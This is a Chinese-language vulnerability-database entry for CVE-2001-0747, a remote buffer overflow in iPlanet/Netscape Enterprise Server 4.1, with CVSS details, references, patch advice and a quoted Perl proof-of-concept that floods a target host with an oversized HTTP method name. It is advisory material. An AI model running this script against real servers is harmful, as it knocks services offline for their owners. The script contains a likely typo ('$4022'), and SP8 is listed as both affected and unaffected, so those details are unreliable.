CVE-2001-0747
CVSS7.5
发布时间 :2001-10-18 00:00:00
修订时间 :2008-09-05 16:24:50
NMCOS    

[原文]Buffer overflow in iPlanet Web Server (iWS) Enterprise Edition 4.1, service packs 3 through 7, allows remote attackers to cause a denial of sevice and possibly execute arbitrary code via a long method name in an HTTP request.


[CNNVD]Netscape企业服务器HTTP Method名远程缓冲区溢出漏洞(CNNVD-200110-074)

        
        Netscape Enterprise Server是一个使用比较广泛的Web站点服务器,运行于微软、大多数的UNIX以及Linux平台。
        Netscape企业级服务器在处理HTTP请求时缺少正确边界缓冲检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以WEB权限在系统上执行任意指令。
        攻击者可以发送非法'method name'HTTP请求或者超过4022字节的URI请求,Netscape企业级服务器就会停止响应,精心提交攻击数据可能以WEB权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0747
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0747
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200110-074
(官方数据源) CNNVD

- 其它链接及资源

http://www.iplanet.com/products/iplanet_web_enterprise/iwsalert5.11.html
(VENDOR_ADVISORY)  CONFIRM  http://www.iplanet.com/products/iplanet_web_enterprise/iwsalert5.11.html
http://archives.neohapsis.com/archives/bugtraq/2001-05/0203.html
(VENDOR_ADVISORY)  BUGTRAQ  20010518 Netscape Enterprise Server 4 Method and URI overflow

- 漏洞信息

Netscape企业服务器HTTP Method名远程缓冲区溢出漏洞
高危 边界条件错误
2001-10-18 00:00:00 2006-09-22 00:00:00
远程  
        
        Netscape Enterprise Server是一个使用比较广泛的Web站点服务器,运行于微软、大多数的UNIX以及Linux平台。
        Netscape企业级服务器在处理HTTP请求时缺少正确边界缓冲检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以WEB权限在系统上执行任意指令。
        攻击者可以发送非法'method name'HTTP请求或者超过4022字节的URI请求,Netscape企业级服务器就会停止响应,精心提交攻击数据可能以WEB权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Netscape
        --------
        厂商建议用户采用service pack 8或者之后的版本以修补此漏洞:
        
        http://www.netscape.com

- 漏洞信息

13962
iPlanet Web Server HTTP Request Long Method Name Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

- 时间线

2001-05-11 Unknow
2001-05-11 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Netscape Enterprise Server HTTP Method Name Buffer Overflow Vulnerability
Boundary Condition Error 6792
Yes No
2001-05-19 12:00:00 2009-07-11 08:06:00
Discovery of this vulnerability has been credited to: Robert Cardona <dasquid@digizen-security.com>

- 受影响的程序版本

Netscape Enterprise Server 4.1 SP7
Netscape Enterprise Server 4.1 SP6
Netscape Enterprise Server 4.1 SP5
Netscape Enterprise Server 4.1 SP4
Netscape Enterprise Server 4.1 SP3
iPlanet Web Server 4.1 SP7
iPlanet Web Server 4.1 SP6
iPlanet Web Server 4.1 SP5
iPlanet Web Server 4.1 SP4
iPlanet Web Server 4.1 SP3
Netscape Enterprise Server 4.1 SP8

- 不受影响的程序版本

Netscape Enterprise Server 4.1 SP8

- 漏洞讨论

It has been reported that iPlanet Web Server and Netscape Enterprise Server are prone to a remotely exploitable buffer overflow condition. This is due to insufficient bounds checking when handling HTTP requests.

This condition is reportedly triggered when an invalid HTTP 'method name' or URI request is handled by the vulnerable server. It is possible for remote attackers to corrupt sensitive regions of memory with attacker-supplied values, possibly resulting in execution of arbitrary code.

Code execution will occur in the security context of the vulnerable web server process.

- 漏洞利用

The following proof of concept code was supplied by Robert Cardona &lt;dasquid@digizen-security.com&gt;:

#!/usr/bin/perl
use IO::Socket;
if (@ARGV &lt; 2) {
print "Usage: host port\n";
exit;
}
$overflow = "A" x $4022;
&amp;connect;
sleep(15);
&amp;connect;
exit;
################################################
sub connect() {
$sock= IO::Socket::INET-&gt;new(Proto=&gt;"TCP",
PeerAddr=&gt;$ARGV[0],
PeerPort=&gt;"$ARGV[1]",)
or die "Cant connect to $ARGV[0]: $!\n";
$sock-&gt;autoflush(1);
print $sock "$overflow /index.html HTTP/1.0\n\n";
$response=&lt;$sock&gt;;
print "$response";
while(&lt;$sock&gt;){
print "$_\n";
}
close $sock;
}

- 解决方案

The vendor has advised, to resolve this vulnerability, that users upgrade to service pack 8 or later.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站